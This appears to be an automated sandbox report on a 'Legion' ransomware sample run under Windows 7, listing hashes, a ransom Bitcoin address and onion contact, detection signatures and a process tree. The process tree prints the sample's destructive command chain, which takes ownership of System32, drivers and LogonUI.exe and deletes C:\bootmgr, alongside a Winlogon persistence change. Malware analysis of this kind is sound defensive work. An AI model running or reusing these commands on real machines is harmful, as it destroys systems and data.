Analysis
-
max time kernel
151s -
max time network
45s -
platform
windows7_x64 -
resource
win7-20220812-en -
resource tags
arch:x64arch:x86image:win7-20220812-enlocale:en-usos:windows7-x64system -
submitted
22-09-2022 17:42
Behavioral task
behavioral1
Sample
HEUR-Trojan.Win32.Generic-78f4dd4b0e0bff6009f56a8b97332f600cec39e3c1d0e1cac6c7ee47a4bb9201.exe
Resource
win7-20220812-en
Behavioral task
behavioral2
Sample
HEUR-Trojan.Win32.Generic-78f4dd4b0e0bff6009f56a8b97332f600cec39e3c1d0e1cac6c7ee47a4bb9201.exe
Resource
win10v2004-20220812-en
General
-
Target
HEUR-Trojan.Win32.Generic-78f4dd4b0e0bff6009f56a8b97332f600cec39e3c1d0e1cac6c7ee47a4bb9201.exe
-
Size
6.1MB
-
MD5
04df8dd30da8b5853f48cc1ac9b695a8
-
SHA1
4c02262c2fea0e99277a99dcbe28a9c370b87c39
-
SHA256
78f4dd4b0e0bff6009f56a8b97332f600cec39e3c1d0e1cac6c7ee47a4bb9201
-
SHA512
3ad10c1512e316ff9d02bd5b4573298ae2f6fc8f9d56c66e2c5c4d95fe046e5b14b09e63cea9bca778560ce4b568ebdf70d66a0225b2eaf7e6cd3ba914583b7e
-
SSDEEP
3072:jnsbblTAByHNgb0nbYlwKsw962CpJid72gqV/6c4LNobbamucc3OD4iEDzyEaE0u:jnsq7hQplBdJ7bP4L8rVE
Malware Config
Extracted
C:\Users\Admin\AppData\Local\Temp\LegionReadMe.txt
131fjhrB4wH8j6adZXudp1Wn23pR33tpAh
http://mail2tor2zyjdctd.onion/
Signatures
-
Modifies WinLogon for persistence 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "empty" HEUR-Trojan.Win32.Generic-78f4dd4b0e0bff6009f56a8b97332f600cec39e3c1d0e1cac6c7ee47a4bb9201.exe -
Disables Task Manager via registry modification
-
Modifies extensions of user files 1 IoCs
Ransomware generally changes the extension on encrypted files.
description ioc Process File renamed C:\Users\Admin\Pictures\SyncSwitch.png => C:\Users\Admin\Pictures\SyncSwitch.png.82uqjb1k5wya30pbb1nisyr68himefklnyhfdsfdrt8sbaxd2ju0 HEUR-Trojan.Win32.Generic-78f4dd4b0e0bff6009f56a8b97332f600cec39e3c1d0e1cac6c7ee47a4bb9201.exe -
Possible privilege escalation attempt 7 IoCs
pid Process 1240 takeown.exe 1756 takeown.exe 1328 icacls.exe 1136 takeown.exe 852 icacls.exe 1704 takeown.exe 2020 icacls.exe -
Modifies file permissions 1 TTPs 7 IoCs
pid Process 1240 takeown.exe 1756 takeown.exe 1328 icacls.exe 1136 takeown.exe 852 icacls.exe 1704 takeown.exe 2020 icacls.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\wp.bmp" HEUR-Trojan.Win32.Generic-78f4dd4b0e0bff6009f56a8b97332f600cec39e3c1d0e1cac6c7ee47a4bb9201.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Opens file in notepad (likely ransom note) 1 IoCs
pid Process 1092 NOTEPAD.EXE -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 980 HEUR-Trojan.Win32.Generic-78f4dd4b0e0bff6009f56a8b97332f600cec39e3c1d0e1cac6c7ee47a4bb9201.exe 980 HEUR-Trojan.Win32.Generic-78f4dd4b0e0bff6009f56a8b97332f600cec39e3c1d0e1cac6c7ee47a4bb9201.exe 980 HEUR-Trojan.Win32.Generic-78f4dd4b0e0bff6009f56a8b97332f600cec39e3c1d0e1cac6c7ee47a4bb9201.exe 980 HEUR-Trojan.Win32.Generic-78f4dd4b0e0bff6009f56a8b97332f600cec39e3c1d0e1cac6c7ee47a4bb9201.exe 980 HEUR-Trojan.Win32.Generic-78f4dd4b0e0bff6009f56a8b97332f600cec39e3c1d0e1cac6c7ee47a4bb9201.exe 980 HEUR-Trojan.Win32.Generic-78f4dd4b0e0bff6009f56a8b97332f600cec39e3c1d0e1cac6c7ee47a4bb9201.exe 980 HEUR-Trojan.Win32.Generic-78f4dd4b0e0bff6009f56a8b97332f600cec39e3c1d0e1cac6c7ee47a4bb9201.exe 980 HEUR-Trojan.Win32.Generic-78f4dd4b0e0bff6009f56a8b97332f600cec39e3c1d0e1cac6c7ee47a4bb9201.exe 980 HEUR-Trojan.Win32.Generic-78f4dd4b0e0bff6009f56a8b97332f600cec39e3c1d0e1cac6c7ee47a4bb9201.exe 980 HEUR-Trojan.Win32.Generic-78f4dd4b0e0bff6009f56a8b97332f600cec39e3c1d0e1cac6c7ee47a4bb9201.exe 980 HEUR-Trojan.Win32.Generic-78f4dd4b0e0bff6009f56a8b97332f600cec39e3c1d0e1cac6c7ee47a4bb9201.exe 980 HEUR-Trojan.Win32.Generic-78f4dd4b0e0bff6009f56a8b97332f600cec39e3c1d0e1cac6c7ee47a4bb9201.exe 980 HEUR-Trojan.Win32.Generic-78f4dd4b0e0bff6009f56a8b97332f600cec39e3c1d0e1cac6c7ee47a4bb9201.exe 980 HEUR-Trojan.Win32.Generic-78f4dd4b0e0bff6009f56a8b97332f600cec39e3c1d0e1cac6c7ee47a4bb9201.exe 980 HEUR-Trojan.Win32.Generic-78f4dd4b0e0bff6009f56a8b97332f600cec39e3c1d0e1cac6c7ee47a4bb9201.exe 980 HEUR-Trojan.Win32.Generic-78f4dd4b0e0bff6009f56a8b97332f600cec39e3c1d0e1cac6c7ee47a4bb9201.exe 980 HEUR-Trojan.Win32.Generic-78f4dd4b0e0bff6009f56a8b97332f600cec39e3c1d0e1cac6c7ee47a4bb9201.exe 980 HEUR-Trojan.Win32.Generic-78f4dd4b0e0bff6009f56a8b97332f600cec39e3c1d0e1cac6c7ee47a4bb9201.exe 980 HEUR-Trojan.Win32.Generic-78f4dd4b0e0bff6009f56a8b97332f600cec39e3c1d0e1cac6c7ee47a4bb9201.exe 980 HEUR-Trojan.Win32.Generic-78f4dd4b0e0bff6009f56a8b97332f600cec39e3c1d0e1cac6c7ee47a4bb9201.exe 980 HEUR-Trojan.Win32.Generic-78f4dd4b0e0bff6009f56a8b97332f600cec39e3c1d0e1cac6c7ee47a4bb9201.exe 980 HEUR-Trojan.Win32.Generic-78f4dd4b0e0bff6009f56a8b97332f600cec39e3c1d0e1cac6c7ee47a4bb9201.exe 980 HEUR-Trojan.Win32.Generic-78f4dd4b0e0bff6009f56a8b97332f600cec39e3c1d0e1cac6c7ee47a4bb9201.exe 980 HEUR-Trojan.Win32.Generic-78f4dd4b0e0bff6009f56a8b97332f600cec39e3c1d0e1cac6c7ee47a4bb9201.exe 980 HEUR-Trojan.Win32.Generic-78f4dd4b0e0bff6009f56a8b97332f600cec39e3c1d0e1cac6c7ee47a4bb9201.exe 980 HEUR-Trojan.Win32.Generic-78f4dd4b0e0bff6009f56a8b97332f600cec39e3c1d0e1cac6c7ee47a4bb9201.exe 980 HEUR-Trojan.Win32.Generic-78f4dd4b0e0bff6009f56a8b97332f600cec39e3c1d0e1cac6c7ee47a4bb9201.exe 980 HEUR-Trojan.Win32.Generic-78f4dd4b0e0bff6009f56a8b97332f600cec39e3c1d0e1cac6c7ee47a4bb9201.exe 980 HEUR-Trojan.Win32.Generic-78f4dd4b0e0bff6009f56a8b97332f600cec39e3c1d0e1cac6c7ee47a4bb9201.exe 980 HEUR-Trojan.Win32.Generic-78f4dd4b0e0bff6009f56a8b97332f600cec39e3c1d0e1cac6c7ee47a4bb9201.exe 980 HEUR-Trojan.Win32.Generic-78f4dd4b0e0bff6009f56a8b97332f600cec39e3c1d0e1cac6c7ee47a4bb9201.exe 980 HEUR-Trojan.Win32.Generic-78f4dd4b0e0bff6009f56a8b97332f600cec39e3c1d0e1cac6c7ee47a4bb9201.exe 980 HEUR-Trojan.Win32.Generic-78f4dd4b0e0bff6009f56a8b97332f600cec39e3c1d0e1cac6c7ee47a4bb9201.exe 980 HEUR-Trojan.Win32.Generic-78f4dd4b0e0bff6009f56a8b97332f600cec39e3c1d0e1cac6c7ee47a4bb9201.exe 980 HEUR-Trojan.Win32.Generic-78f4dd4b0e0bff6009f56a8b97332f600cec39e3c1d0e1cac6c7ee47a4bb9201.exe 980 HEUR-Trojan.Win32.Generic-78f4dd4b0e0bff6009f56a8b97332f600cec39e3c1d0e1cac6c7ee47a4bb9201.exe 980 HEUR-Trojan.Win32.Generic-78f4dd4b0e0bff6009f56a8b97332f600cec39e3c1d0e1cac6c7ee47a4bb9201.exe 980 HEUR-Trojan.Win32.Generic-78f4dd4b0e0bff6009f56a8b97332f600cec39e3c1d0e1cac6c7ee47a4bb9201.exe 980 HEUR-Trojan.Win32.Generic-78f4dd4b0e0bff6009f56a8b97332f600cec39e3c1d0e1cac6c7ee47a4bb9201.exe 980 HEUR-Trojan.Win32.Generic-78f4dd4b0e0bff6009f56a8b97332f600cec39e3c1d0e1cac6c7ee47a4bb9201.exe 980 HEUR-Trojan.Win32.Generic-78f4dd4b0e0bff6009f56a8b97332f600cec39e3c1d0e1cac6c7ee47a4bb9201.exe 980 HEUR-Trojan.Win32.Generic-78f4dd4b0e0bff6009f56a8b97332f600cec39e3c1d0e1cac6c7ee47a4bb9201.exe 980 HEUR-Trojan.Win32.Generic-78f4dd4b0e0bff6009f56a8b97332f600cec39e3c1d0e1cac6c7ee47a4bb9201.exe 980 HEUR-Trojan.Win32.Generic-78f4dd4b0e0bff6009f56a8b97332f600cec39e3c1d0e1cac6c7ee47a4bb9201.exe 980 HEUR-Trojan.Win32.Generic-78f4dd4b0e0bff6009f56a8b97332f600cec39e3c1d0e1cac6c7ee47a4bb9201.exe 980 HEUR-Trojan.Win32.Generic-78f4dd4b0e0bff6009f56a8b97332f600cec39e3c1d0e1cac6c7ee47a4bb9201.exe 980 HEUR-Trojan.Win32.Generic-78f4dd4b0e0bff6009f56a8b97332f600cec39e3c1d0e1cac6c7ee47a4bb9201.exe 980 HEUR-Trojan.Win32.Generic-78f4dd4b0e0bff6009f56a8b97332f600cec39e3c1d0e1cac6c7ee47a4bb9201.exe 980 HEUR-Trojan.Win32.Generic-78f4dd4b0e0bff6009f56a8b97332f600cec39e3c1d0e1cac6c7ee47a4bb9201.exe 980 HEUR-Trojan.Win32.Generic-78f4dd4b0e0bff6009f56a8b97332f600cec39e3c1d0e1cac6c7ee47a4bb9201.exe 980 HEUR-Trojan.Win32.Generic-78f4dd4b0e0bff6009f56a8b97332f600cec39e3c1d0e1cac6c7ee47a4bb9201.exe 980 HEUR-Trojan.Win32.Generic-78f4dd4b0e0bff6009f56a8b97332f600cec39e3c1d0e1cac6c7ee47a4bb9201.exe 980 HEUR-Trojan.Win32.Generic-78f4dd4b0e0bff6009f56a8b97332f600cec39e3c1d0e1cac6c7ee47a4bb9201.exe 980 HEUR-Trojan.Win32.Generic-78f4dd4b0e0bff6009f56a8b97332f600cec39e3c1d0e1cac6c7ee47a4bb9201.exe 980 HEUR-Trojan.Win32.Generic-78f4dd4b0e0bff6009f56a8b97332f600cec39e3c1d0e1cac6c7ee47a4bb9201.exe 980 HEUR-Trojan.Win32.Generic-78f4dd4b0e0bff6009f56a8b97332f600cec39e3c1d0e1cac6c7ee47a4bb9201.exe 980 HEUR-Trojan.Win32.Generic-78f4dd4b0e0bff6009f56a8b97332f600cec39e3c1d0e1cac6c7ee47a4bb9201.exe 980 HEUR-Trojan.Win32.Generic-78f4dd4b0e0bff6009f56a8b97332f600cec39e3c1d0e1cac6c7ee47a4bb9201.exe 980 HEUR-Trojan.Win32.Generic-78f4dd4b0e0bff6009f56a8b97332f600cec39e3c1d0e1cac6c7ee47a4bb9201.exe 980 HEUR-Trojan.Win32.Generic-78f4dd4b0e0bff6009f56a8b97332f600cec39e3c1d0e1cac6c7ee47a4bb9201.exe 980 HEUR-Trojan.Win32.Generic-78f4dd4b0e0bff6009f56a8b97332f600cec39e3c1d0e1cac6c7ee47a4bb9201.exe 980 HEUR-Trojan.Win32.Generic-78f4dd4b0e0bff6009f56a8b97332f600cec39e3c1d0e1cac6c7ee47a4bb9201.exe 980 HEUR-Trojan.Win32.Generic-78f4dd4b0e0bff6009f56a8b97332f600cec39e3c1d0e1cac6c7ee47a4bb9201.exe 980 HEUR-Trojan.Win32.Generic-78f4dd4b0e0bff6009f56a8b97332f600cec39e3c1d0e1cac6c7ee47a4bb9201.exe -
Suspicious use of AdjustPrivilegeToken 6 IoCs
description pid Process Token: SeDebugPrivilege 980 HEUR-Trojan.Win32.Generic-78f4dd4b0e0bff6009f56a8b97332f600cec39e3c1d0e1cac6c7ee47a4bb9201.exe Token: SeDebugPrivilege 980 HEUR-Trojan.Win32.Generic-78f4dd4b0e0bff6009f56a8b97332f600cec39e3c1d0e1cac6c7ee47a4bb9201.exe Token: SeTakeOwnershipPrivilege 1756 takeown.exe Token: SeTakeOwnershipPrivilege 1136 takeown.exe Token: SeTakeOwnershipPrivilege 1704 takeown.exe Token: SeTakeOwnershipPrivilege 1240 takeown.exe -
Suspicious use of WriteProcessMemory 33 IoCs
description pid Process procid_target PID 980 wrote to memory of 1484 980 HEUR-Trojan.Win32.Generic-78f4dd4b0e0bff6009f56a8b97332f600cec39e3c1d0e1cac6c7ee47a4bb9201.exe 28 PID 980 wrote to memory of 1484 980 HEUR-Trojan.Win32.Generic-78f4dd4b0e0bff6009f56a8b97332f600cec39e3c1d0e1cac6c7ee47a4bb9201.exe 28 PID 980 wrote to memory of 1484 980 HEUR-Trojan.Win32.Generic-78f4dd4b0e0bff6009f56a8b97332f600cec39e3c1d0e1cac6c7ee47a4bb9201.exe 28 PID 1484 wrote to memory of 1756 1484 cmd.exe 30 PID 1484 wrote to memory of 1756 1484 cmd.exe 30 PID 1484 wrote to memory of 1756 1484 cmd.exe 30 PID 1484 wrote to memory of 1328 1484 cmd.exe 31 PID 1484 wrote to memory of 1328 1484 cmd.exe 31 PID 1484 wrote to memory of 1328 1484 cmd.exe 31 PID 1484 wrote to memory of 1136 1484 cmd.exe 32 PID 1484 wrote to memory of 1136 1484 cmd.exe 32 PID 1484 wrote to memory of 1136 1484 cmd.exe 32 PID 1484 wrote to memory of 852 1484 cmd.exe 33 PID 1484 wrote to memory of 852 1484 cmd.exe 33 PID 1484 wrote to memory of 852 1484 cmd.exe 33 PID 1484 wrote to memory of 1704 1484 cmd.exe 34 PID 1484 wrote to memory of 1704 1484 cmd.exe 34 PID 1484 wrote to memory of 1704 1484 cmd.exe 34 PID 1484 wrote to memory of 2020 1484 cmd.exe 35 PID 1484 wrote to memory of 2020 1484 cmd.exe 35 PID 1484 wrote to memory of 2020 1484 cmd.exe 35 PID 1484 wrote to memory of 1240 1484 cmd.exe 36 PID 1484 wrote to memory of 1240 1484 cmd.exe 36 PID 1484 wrote to memory of 1240 1484 cmd.exe 36 PID 980 wrote to memory of 560 980 HEUR-Trojan.Win32.Generic-78f4dd4b0e0bff6009f56a8b97332f600cec39e3c1d0e1cac6c7ee47a4bb9201.exe 38 PID 980 wrote to memory of 560 980 HEUR-Trojan.Win32.Generic-78f4dd4b0e0bff6009f56a8b97332f600cec39e3c1d0e1cac6c7ee47a4bb9201.exe 38 PID 980 wrote to memory of 560 980 HEUR-Trojan.Win32.Generic-78f4dd4b0e0bff6009f56a8b97332f600cec39e3c1d0e1cac6c7ee47a4bb9201.exe 38 PID 980 wrote to memory of 1092 980 HEUR-Trojan.Win32.Generic-78f4dd4b0e0bff6009f56a8b97332f600cec39e3c1d0e1cac6c7ee47a4bb9201.exe 40 PID 980 wrote to memory of 1092 980 HEUR-Trojan.Win32.Generic-78f4dd4b0e0bff6009f56a8b97332f600cec39e3c1d0e1cac6c7ee47a4bb9201.exe 40 PID 980 wrote to memory of 1092 980 HEUR-Trojan.Win32.Generic-78f4dd4b0e0bff6009f56a8b97332f600cec39e3c1d0e1cac6c7ee47a4bb9201.exe 40 PID 560 wrote to memory of 1108 560 cmd.exe 41 PID 560 wrote to memory of 1108 560 cmd.exe 41 PID 560 wrote to memory of 1108 560 cmd.exe 41
Processes
-
C:\Users\Admin\AppData\Local\Temp\HEUR-Trojan.Win32.Generic-78f4dd4b0e0bff6009f56a8b97332f600cec39e3c1d0e1cac6c7ee47a4bb9201.exe"C:\Users\Admin\AppData\Local\Temp\HEUR-Trojan.Win32.Generic-78f4dd4b0e0bff6009f56a8b97332f600cec39e3c1d0e1cac6c7ee47a4bb9201.exe"1⤵
- Modifies WinLogon for persistence
- Modifies extensions of user files
- Sets desktop wallpaper using registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:980 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32 && icacls C:\Windows\System32 /grant %username%:F && takeown /f C:\Windows\System32\drivers && icacls C:\Windows\System32\drivers /grant %username%:F && takeown /f C:\Windows\System32\LogonUI.exe && icacls C:\Windows\System32\LogonUI.exe /grant %username%:F && takeown /f C:\bootmgr && icacls C:\bootmgr /grant %username%:F && attrib -s -r -h C:\bootmgr && del C:\bootmgr && Exit2⤵
- Suspicious use of WriteProcessMemory
PID:1484 -
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System323⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:1756
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32 /grant Admin:F3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1328
-
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers3⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:1136
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers /grant Admin:F3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:852
-
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\LogonUI.exe3⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:1704
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\LogonUI.exe /grant Admin:F3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:2020
-
-
C:\Windows\system32\takeown.exetakeown /f C:\bootmgr3⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:1240
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k rundll32 user32.dll,UpdatePerUserSystemParameters && Exit2⤵
- Suspicious use of WriteProcessMemory
PID:560 -
C:\Windows\system32\rundll32.exerundll32 user32.dll,UpdatePerUserSystemParameters3⤵PID:1108
-
-
-
C:\Windows\system32\NOTEPAD.EXE"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\AppData\Local\Temp\LegionReadMe.txt2⤵
- Opens file in notepad (likely ransom note)
PID:1092
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD57db09a04d53ec49b19596d7836ac2286
SHA1f92b734a6fd58d4a729d14f32bd69d588d03fb70
SHA256eb07471b556a3a18b04c9f14d98f0d8345f6a249a74eea2148af19b50c97c5e7
SHA512fc597891e55cfd69aaf709d20f89c088c6e4632a0f1b3286aaee2d22f98a7f01aaff1f8ec2660086f3434a02d4ea9fa0a5df60eac95abe9be56be8aee6d92897